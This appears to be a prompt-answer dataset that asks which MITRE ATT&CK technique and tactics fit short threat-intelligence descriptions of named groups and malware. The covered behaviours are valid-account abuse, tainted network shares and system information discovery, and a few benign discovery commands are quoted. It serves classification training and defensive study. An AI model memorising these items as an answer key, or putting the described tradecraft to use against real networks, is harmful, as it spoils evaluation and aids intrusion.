+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Threat Group-1314 actors used compromised domain credentials for the victim's endpoint management platform, Altiris, to move laterally.","Tecnique: T1078.002 Valid Accounts: Domain Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ToddyCat has used compromised domain admin credentials to mount local network shares.,"Tecnique: T1078.002 Valid Accounts: Domain Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Volt Typhoon has used compromised domain accounts to authenticate to devices on compromised networks.,"Tecnique: T1078.002 Valid Accounts: Domain Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider has used administrative accounts, including Domain Admin, to move laterally within a victim network.","Tecnique: T1078.002 Valid Accounts: Domain Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike can use known credentials to run commands and spawn processes as a domain user account.,"Tecnique: T1078.002 Valid Accounts: Domain Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CreepySnail can use stolen credentials to authenticate on target networks.,"Tecnique: T1078.002 Valid Accounts: Domain Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ryuk can use stolen domain admin accounts to move laterally within a victim domain.,"Tecnique: T1078.002 Valid Accounts: Domain Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: If Shamoon cannot access shares using current privileges, it attempts access using hard coded, domain-specific credentials gathered earlier in the intrusion.","Tecnique: T1078.002 Valid Accounts: Domain Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Stuxnet attempts to access network resources with a domain account’s credentials.,"Tecnique: T1078.002 Valid Accounts: Domain Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, threat actors used local account credentials found during the intrusion for lateral movement and privilege escalation.","Tecnique: T1078.003 Valid Accounts: Local Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 used compromised local accounts to access victims' networks.","Tecnique: T1078.003 Valid Accounts: Local Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 targets dormant or inactive user accounts, accounts belonging to individuals no longer at the organization but whose accounts remain on the system, for access and persistence.","Tecnique: T1078.003 Valid Accounts: Local Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 has used legitimate local admin account credentials.,"Tecnique: T1078.003 Valid Accounts: Local Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN10 has moved laterally using the Local Administrator account.,"Tecnique: T1078.003 Valid Accounts: Local Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN7 has used compromised credentials for access as SYSTEM on Exchange servers.,"Tecnique: T1078.003 Valid Accounts: Local Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HAFNIUM has used the NT AUTHORITY\SYSTEM account to create files on Exchange servers.,"Tecnique: T1078.003 Valid Accounts: Local Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has used a tool called GREASE to add a Windows admin account in order to allow them continued access via RDP.,"Tecnique: T1078.003 Valid Accounts: Local Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PROMETHIUM has created admin accounts on a compromised host.,"Tecnique: T1078.003 Valid Accounts: Local Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tropic Trooper has used known administrator account credentials to execute the backdoor directly.,"Tecnique: T1078.003 Valid Accounts: Local Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla has abused local accounts that have the same password across the victim’s network.,"Tecnique: T1078.003 Valid Accounts: Local Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike can use known credentials to run commands and spawn processes as a local user account.,"Tecnique: T1078.003 Valid Accounts: Local Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Emotet can brute force a local admin password, then use it to facilitate lateral movement.","Tecnique: T1078.003 Valid Accounts: Local Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NotPetya can use valid credentials with PsExec or wmic to spread itself to remote systems.,"Tecnique: T1078.003 Valid Accounts: Local Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Umbreon creates valid local users to provide access to the system.,"Tecnique: T1078.003 Valid Accounts: Local Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0027, Scattered Spider leveraged compromised credentials from victim users to authenticate to Azure tenants.","Tecnique: T1078.004 Valid Accounts: Cloud Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 used a compromised O365 administrator account to create a new Service Principal.","Tecnique: T1078.004 Valid Accounts: Cloud Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 has used compromised Office 365 service accounts with Global Administrator privileges to collect email from user inboxes.,"Tecnique: T1078.004 Valid Accounts: Cloud Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 has gained access to a global administrator account in Azure AD and has used `Service Principal` credentials in Exchange.,"Tecnique: T1078.004 Valid Accounts: Cloud Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT33 has used compromised Office 365 accounts in tandem with Ruler in an attempt to gain control of endpoints.,"Tecnique: T1078.004 Valid Accounts: Cloud Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT5 has accessed Microsoft M365 cloud environments using stolen credentials.,"Tecnique: T1078.004 Valid Accounts: Cloud Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ke3chang has used compromised credentials to sign into victims’ Microsoft 365 accounts.,"Tecnique: T1078.004 Valid Accounts: Cloud Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LAPSUS$ has used compromised credentials to access cloud assets within a target organization.,"Tecnique: T1078.004 Valid Accounts: Cloud Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pacu leverages valid cloud accounts to perform most of its operations.,"Tecnique: T1078.004 Valid Accounts: Cloud Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Peirates can use stolen service account tokens to perform its operations.,"Tecnique: T1078.004 Valid Accounts: Cloud Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ROADTools leverages valid cloud credentials to perform enumeration operations using the internal Azure AD Graph API.,"Tecnique: T1078.004 Valid Accounts: Cloud Accounts, Tactic: TA0005 Defense Evasion TA0001 Initial Access TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BRONZE BUTLER has placed malware on file shares and given it the same name as legitimate documents on the share.,"Tecnique: T1080 Taint Shared Content, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cinnamon Tempest has deployed ransomware from a batch file in a network share.,"Tecnique: T1080 Taint Shared Content, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Darkhotel used a virus that propagates by infecting executables stored on shared drives.,"Tecnique: T1080 Taint Shared Content, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gamaredon Group has injected malicious macros into all Word and Excel documents on mapped network drives.,"Tecnique: T1080 Taint Shared Content, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Conti can spread itself by infecting other remote machines via network shared drives.,"Tecnique: T1080 Taint Shared Content, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: H1N1 has functionality to copy itself to network shares.,"Tecnique: T1080 Taint Shared Content, Tactic: TA0008 Lateral Movement"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole can replace legitimate software or documents in the compromised network with their trojanized versions, in an attempt to propagate itself within the network.","Tecnique: T1080 Taint Shared Content, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Miner-C copies itself into the public folder of Network Attached Storage (NAS) devices and infects new victims who open the file.,"Tecnique: T1080 Taint Shared Content, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ramsay can spread itself by infecting other portable executable files on networks shared drives.,"Tecnique: T1080 Taint Shared Content, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Stuxnet infects remote servers via network shares and by infecting WinCC database views with malicious code.,"Tecnique: T1080 Taint Shared Content, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ursnif has copied itself to and infected files in network drives for propagation.,"Tecnique: T1080 Taint Shared Content, Tactic: TA0008 Lateral Movement"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0017, APT41 issued `ping -n 1 ((cmd /c dir c:\|findstr Number).split()[-1]+` commands to find the volume serial number of compromised systems.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Cutting Edge, threat actors used the ENUM4LINUX Perl script for discovery on Windows and Samba hosts.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Frankenstein, the threat actors used Empire to obtain the compromised machine's name.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During FunnyDream, the threat actors used Systeminfo to collect information on targeted hosts.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation CuckooBees, the threat actors used the `systeminfo` command to gather details about a compromised system.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Honeybee, the threat actors collected the computer name, OS, and other system information using `cmd /c systeminfo > %temp%\ temp.ini`.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, threat actors discovered the local disks attached to the system and their hardware information including manufacturer and model, as well as the OS versions of systems connected to a targeted network.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 used `fsutil` to check available free space before executing actions that might create large files on disk.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT18 can collect system information from the victim’s machine.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT19 collected system architecture information. APT19 used an HTTP malware variant and a Port 22 malware variant to gather the hostname and CPU information from the victim’s machine.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT3 has a tool that can obtain information about the local system.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 has collected the OS version and computer name from victims. One of the group's backdoors can also query the Windows Registry to gather system information, and another macOS backdoor performs a fingerprint of the machine on its first connection to the C&C server. APT32 executed shellcode to identify the name of the infected host.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT37 collects the computer name, the BIOS model, and execution path.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT38 has attempted to get detailed information about a compromised host, including the operating system, version, patches, hotfixes, and service packs.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 uses multiple built-in commands such as systeminfo and `net config Workstation` to enumerate victim system basic configuration information.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Aquatic Panda has used native OS commands to understand privilege levels and system details.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Blue Mockingbird has collected hardware details for the victim's system, including CPU and memory information.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chimera has used `fsutil fsinfo drives`, `systeminfo`, and `vssadmin list shadows` for system information including shadow volumes and drive information.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Confucius has used a file stealer that can examine system drives, including those other than the C drive.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Darkhotel has collected the hostname, OS version, service pack version, and the processor architecture from the victim’s machine.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN13 has collected local host information by utilizing Windows commands `systeminfo`, `fsutil`, and `fsinfo`. FIN13 has also utilized a compromised Symantex Altiris console and LanDesk account to retrieve host information.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN8 has used PowerShell Scripts to check the architecture of a compromised machine before the selection of a 32-bit or 64-bit version of a malicious .NET loader.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A Gamaredon Group file stealer can gather the victim's computer name and drive serial numbers to send to a C2 server.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HEXANE has collected the hostname of a compromised machine.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Higaisa collected the system volume serial number, GUID, and computer name.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Inception has used a reconnaissance module to gather information about the operating system and hardware on the infected host.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ke3chang performs operating system information discovery using systeminfo and has used implants to identify the system language and computer name.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has enumerated drives, OS type, OS version, and other information using a script or the ""systeminfo"" command.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Several Lazarus Group malware families collect information on the type and version of the victim OS, as well as the victim computer name and CPU information. A Destover-like variant used by Lazarus Group also collects disk space information and sends it to its C2 server.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound malware has used a PowerShell command to check the victim system architecture to determine if it is an x64 machine. Other malware has obtained the OS version, UUID, and computer/host name to send to the C2 server.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Malteiro collects the machine information, system architecture, the OS version, computer name, and Windows product name.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Moses Staff collected information about the infected host, including the machine names and OS architecture.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MuddyWater has used malware that can collect the victim’s OS version and machine name.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mustang Panda has gathered system information using systeminfo.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mustard Tempest has used implants to perform system reconnaissance on targeted systems.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OilRig has run hostname and systeminfo on a victim.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Patchwork collected the victim computer name, OS version, and architecture type and sent the information to its C2 server. Patchwork also enumerated all available drives on the victim's machine.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rocke has used uname -m to collect the name and information about the infected system's kernel.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team used a backdoor to enumerate information about the infected system's operating system.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SideCopy has identified the OS version of a compromised host.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sidewinder has used tools to collect the computer name, OS version, installed hotfixes, as well as information regarding the memory and processor on a compromised host.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sowbug obtained OS version and hardware configuration from a victim.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Stealth Falcon malware gathers system information via WMI, including the system directory, build number, serial number, version, manufacturer, model, and total physical memory.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA2541 has collected system information prior to downloading malware on the targeted host.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TeamTNT has searched for system version, architecture, disk partition, logical volume, and hostname information.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ToddyCat has collected information on bootable drives including model, vendor, and serial numbers.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tropic Trooper has detected a target system’s OS version and system volume information.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla surveys a system upon check-in to discover operating system configuration details using the systeminfo and set commands.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Volt Typhoon has discovered file system types, drive names, size, and free space on compromised systems.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Windigo has used a script to detect which Linux distribution and version is currently installed on the system.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Windshift has used malware to identify the computer name of a compromised host.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider has used Systeminfo and similar commands to acquire detailed configuration information of a victim's machine. Wizard Spider has also utilized the PowerShell cmdlet `Get-ADComputer` to collect DNS hostnames, last logon dates, and operating system information from Active Directory.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZIRCONIUM has used a tool to capture the processor architecture of a compromised host in order to register it with C2.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: admin@338 actors used the following commands after exploiting a machine with LOWBALL malware to obtain information about the OS: ver >> %temp%\download systeminfo >> %temp%\download,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: 4H RAT sends an OS version identifier in its beacons.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ADVSTORESHELL can run Systeminfo to gather information about the victim.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Action RAT has the ability to collect the hostname, OS version, and OS architecture of an infected host.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Agent Tesla can collect the system's computer name and also has the capability to collect information on the processor, memory, OS, and video card from the system.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Akira uses the GetSystemInfo Windows function to determine the number of processors on a victim machine.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Amadey has collected the computer name and OS version from a compromised machine.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Anchor can determine the hostname and linux version on a compromised host.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AppleJeus has collected the victim host information after infection.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AppleSeed can identify the OS version of a targeted system.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Aria-body has the ability to identify the hostname, computer name, Windows version, processor speed, machine GUID, and disk information on a compromised host.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Astaroth collects the machine name and keyboard language from the system.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AsyncRAT can check the disk size through the values obtained with `DeviceInfo.`,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Attor monitors the free disk space on the system.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AuTo Stealer has the ability to collect the hostname and OS information from an infected host.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Avenger has the ability to identify the host volume ID and the OS architecture on a compromised host.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Azorult can collect the machine information, system architecture, the OS version, computer name, Windows product name, the number of CPU cores, video card information, and the system language.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During its initial execution, BACKSPACE extracts operating system information from the infected host.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADCALL collects the computer name and host name on the compromised system.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADFLICK has captured victim computer name, memory space, and CPU details.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADHATCH can obtain current system information from a compromised machine such as the `SHELL PID`, `PSVERSION`, `HOSTNAME`, `LOGONSERVER`, `LASTBOOTUP`, drive information, OS type/version, bitness, and hostname.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BISCUIT has a command to collect the processor type, operation system, computer name, and whether the system is a laptop or PC.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BLINDINGCAN has collected from a victim machine the system name, processor information, OS version, and disk information, including type and free space available.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BLUELIGHT has collected the computer name and OS version from victim machines.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BUBBLEWRAP collects system information, including the operating system version and hostname.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Babuk can enumerate disk volumes, get disk information, and query service status.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BabyShark has executed the ver command.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BackConfig has the ability to gather the victim's computer name.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Backdoor.Oldrea collects information about the OS and computer name.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BadPatch collects the OS system, OS version, MAC address, and the computer name from the victim’s machine.","Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bandook can collect information about the drives available on the system.,"Tecnique: T1082 System Information Discovery, Tactic: TA0007 Discovery"
